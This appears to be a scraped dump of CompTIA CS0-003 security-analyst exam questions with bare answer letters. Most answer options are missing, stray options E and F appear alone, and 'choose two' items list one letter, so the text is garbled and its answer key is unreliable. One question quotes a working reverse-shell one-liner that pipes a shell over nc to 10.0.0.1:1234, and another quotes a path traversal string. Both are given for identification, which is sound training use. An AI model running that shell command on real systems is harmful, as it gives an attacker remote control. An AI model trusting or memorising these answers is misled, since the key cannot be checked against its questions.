CompTIA's CS0-003 An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Choose two.) E. Require diagrams to be completed for all critical systems. F. Ensure that all assets are properly listed in the inventory management system.
#271
Answer: C
CompTIA's CS0-003 An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?
#272
Answer: C
CompTIA's CS0-003 A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?
#273
Answer: B
CompTIA's CS0-003 An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?
#274
Answer: D
CompTIA's CS0-003 A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?
#275
Answer: C
CompTIA's CS0-003 A security analyst detected the following suspicious activity:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f
Which of the following most likely describes the activity?
#276
Answer: D
CompTIA's CS0-003 An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve?
#277
Answer: A
CompTIA's CS0-003 Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?
#278
Answer: B
CompTIA's CS0-003 Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Choose two.) E. Write blocker F. Drive duplicator
#279
Answer: A
CompTIA's CS0-003 During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?
#280
Answer: C
CompTIA's CS0-003 An organization has tracked several incidents that are listed in the following table: Which of the following is the organization’s MTTD?
#281
Answer: C
CompTIA's CS0-003 A security analyst has found a moderate-risk item in an organization’s point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?
#282
Answer: B
CompTIA's CS0-003 While reviewing the web server logs, a security analyst notices the following snippet:
..\../..\../boot.ini
Which of the following is being attempted? E. Enumeration of /etc/passwd
#283
Answer: A
CompTIA's CS0-003 Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?
#284
Answer: B
CompTIA's CS0-003 Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?
#285
Answer: C
CompTIA's CS0-003 Which of the following best describes the importance of KPIs in an incident response exercise?
#286
Answer: C
CompTIA's CS0-003 An organization is conducting a pilot deployment of an e-commerce application. The application’s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?
#287
Answer: C
CompTIA's CS0-003 A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?
#288
Answer: B
CompTIA's CS0-003 A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?
#289
Answer: D
CompTIA's CS0-003 A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vulnerabilities should be patched first?
#290
Answer: A
CompTIA's CS0-003 Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?
#291
Answer: C
CompTIA's CS0-003 An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?
#292
Answer: A
CompTIA's CS0-003 A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?
#293
Answer: B
CompTIA's CS0-003 A corporation wants to implement an agent-based endpoint solution to help:
• Flag various threats
• Review vulnerability feeds
• Aggregate data
• Provide real-time metrics by using scripting languages
Which of the following tools should the corporation implement to reach this goal?
#294
Answer: C
CompTIA's CS0-003 A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?
#295
Answer: D
CompTIA's CS0-003 Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?
#296
Answer: B
CompTIA's CS0-003 Which of the following most accurately describes the Cyber Kill Chain methodology?
#297
Answer: C
CompTIA's CS0-003 After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business?
#298
Answer: D
CompTIA's CS0-003 During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?
#299
Answer: A
CompTIA's CS0-003 Which of the following is the best reason to implement an MOU?